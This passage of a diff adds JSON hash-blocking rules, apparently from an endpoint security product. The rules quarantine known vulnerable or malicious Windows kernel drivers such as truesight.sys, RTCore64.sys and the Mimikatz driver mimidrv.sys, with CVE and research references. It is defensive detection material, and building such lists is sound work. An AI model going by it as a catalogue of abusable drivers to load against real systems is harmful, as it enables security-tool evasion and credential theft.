+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489403Z",
+ "creation_date": "2026-03-23T11:45:31.489406Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489413Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c9e1cdedf76956540458a3dbf153c833e54201deea1ab22c08ad6725ed9f19a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20d24f85-d917-5141-8d3e-e34155d9ef51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830132Z",
+ "creation_date": "2026-03-23T11:45:30.830134Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830139Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89021b58a0f068b2d54c7136583224a43a33e2547b5a1aa40a871d9f9731ef73",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20d378f6-b625-51fc-924c-a9eae74ae3bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146367Z",
+ "creation_date": "2026-03-23T11:45:31.146369Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146374Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "60cfdb1641547fa688a114639b6bff13742fc8bb61b85c30d2bf9952c0e3359f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20d5f906-da44-5d2f-9b2c-12d47ab3c975",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817035Z",
+ "creation_date": "2026-03-23T11:45:30.817037Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817042Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a0b10a9e662a0b0eeb951ffd2a82cc71d30939a78daebd26b3f58bb24351ac9",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20e06026-add4-5071-b373-9b0a5cbcac7a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831918Z",
+ "creation_date": "2026-03-23T11:45:30.831920Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831926Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a6c32bb6d976f5f7125d01f30f6e76d0fb6e4c5a33d1bba1d79e30f7dec52274",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20e5e827-9eb5-5bb0-a3af-cbdb55d8620a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453283Z",
+ "creation_date": "2026-03-23T11:45:30.453286Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453296Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a15325e9e6b8e4192291deb56c20c558dde3f96eb682c6e90952844edb984a00",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20f4b53d-3503-52ad-a6ca-74263f59004c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148809Z",
+ "creation_date": "2026-03-23T11:45:31.148812Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148820Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f909d9bf3f0974d6ecda2956d7c2c3c39e693c01550bebed05ee1cf02091eff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2103dd29-832b-557e-a9d0-b8fc4341aa85",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622437Z",
+ "creation_date": "2026-03-23T11:45:29.622441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622447Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3f9530c94b689f39cc83377d76979d443275012e022782a600dcb5cad4cca6aa",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "210706cb-6d84-563b-b5c5-14fe6c91aa97",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819777Z",
+ "creation_date": "2026-03-23T11:45:30.819779Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819785Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77da3e8c5d70978b287d433ae1e1236c895b530a8e1475a9a190cdcc06711d2f",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "21103903-e415-5430-ae82-59bbd377f7b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611062Z",
+ "creation_date": "2026-03-23T11:45:29.611064Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611069Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36729c2c714e05ebf9bc7262bc7f0d5d25d9dc9c8e0c4fdce27143bbdd9d9aa7",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2113e119-a16e-5f6b-b4a7-f50c34a99ed5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816491Z",
+ "creation_date": "2026-03-23T11:45:30.816493Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816498Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "783a127c470a136b07a41bdaf2d78a8e4e73c3fca1a124d33d5f8653ef887d30",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2118f218-c663-5734-a2fd-3d26fc521c1e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820460Z",
+ "creation_date": "2026-03-23T11:45:30.820462Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820468Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ebe114a72d27b5abf47e17137dbb85f52ca987c8bb80ea709eb3293c9637f73c",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "212343ec-985b-5528-b2dc-d836b03015fc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605594Z",
+ "creation_date": "2026-03-23T11:45:29.605596Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605601Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c18b6993154fa0e24d15726c50e8325d32381020786ce22eb1b71184d95af481",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "21290020-1544-54d2-a09d-016502eae338",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453133Z",
+ "creation_date": "2026-03-23T11:45:30.453136Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453145Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c2f1e2b0cc4da128feb73a6b9dd040df8495fefe861d69c9f44778c6ddb9b9b",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "21348137-f6d8-5ef9-8ac9-0021786a1c32",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620900Z",
+ "creation_date": "2026-03-23T11:45:29.620902Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620907Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748",
+ "comment": "Phoenix Technologies Vulnerable Physmem drivers (aka Agent64.sys) [https://www.loldrivers.io/drivers/5943b267-64f3-40d4-8669-354f23dec122/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2134d7da-132a-56af-a8b2-2a040f4ac486",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824115Z",
+ "creation_date": "2026-03-23T11:45:30.824117Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824126Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "394a05770de545620828504403f8a746e5cc1f26d4363317c0497e4b0310b5e8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2148fea8-7aa1-5201-9617-28343f8c4743",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608086Z",
+ "creation_date": "2026-03-23T11:45:29.608088Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608093Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "918d2e68a724b58d37443aea159e70bf8b1b5ebb089c395cad1d62745ecdaa19",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "214e02e9-7fc2-5448-9b0b-c55263ae7f74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489726Z",
+ "creation_date": "2026-03-23T11:45:31.489729Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489737Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b355ff97defd226c9b79f92283c940f9d00bfda1b629dc70c761bf044b7ac8c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2159d869-033a-50c0-9bb7-df80e62a39a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820911Z",
+ "creation_date": "2026-03-23T11:45:30.820913Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820919Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6801e845d380c809d0da8c7a5d3cd2faa382875ae72f5f7af667a34df25fbf7",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2166c90d-2cda-581a-9642-dad07271ef8f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468527Z",
+ "creation_date": "2026-03-23T11:45:30.468530Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468539Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "047e4158225af627382c412fa1f870479a238841341bc13e60312269feb14083",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "216d41f7-eac1-55bd-b87c-b9f5f6d6bf88",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970564Z",
+ "creation_date": "2026-03-23T11:45:29.970566Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970571Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "557d6eb7550b038a3d92832b6218d5e6be72f490958f4ffa87ccd821f8866c3c",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "217915dd-6f83-5c72-9f46-81b8c72200ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472810Z",
+ "creation_date": "2026-03-23T11:45:31.472814Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472821Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "197144bb4d00a04d2860594096b3db45e86581bca9beb131fca69227a2761ccb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "217adcd7-950f-5155-be70-a796ef3fc846",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810011Z",
+ "creation_date": "2026-03-23T11:45:31.810013Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
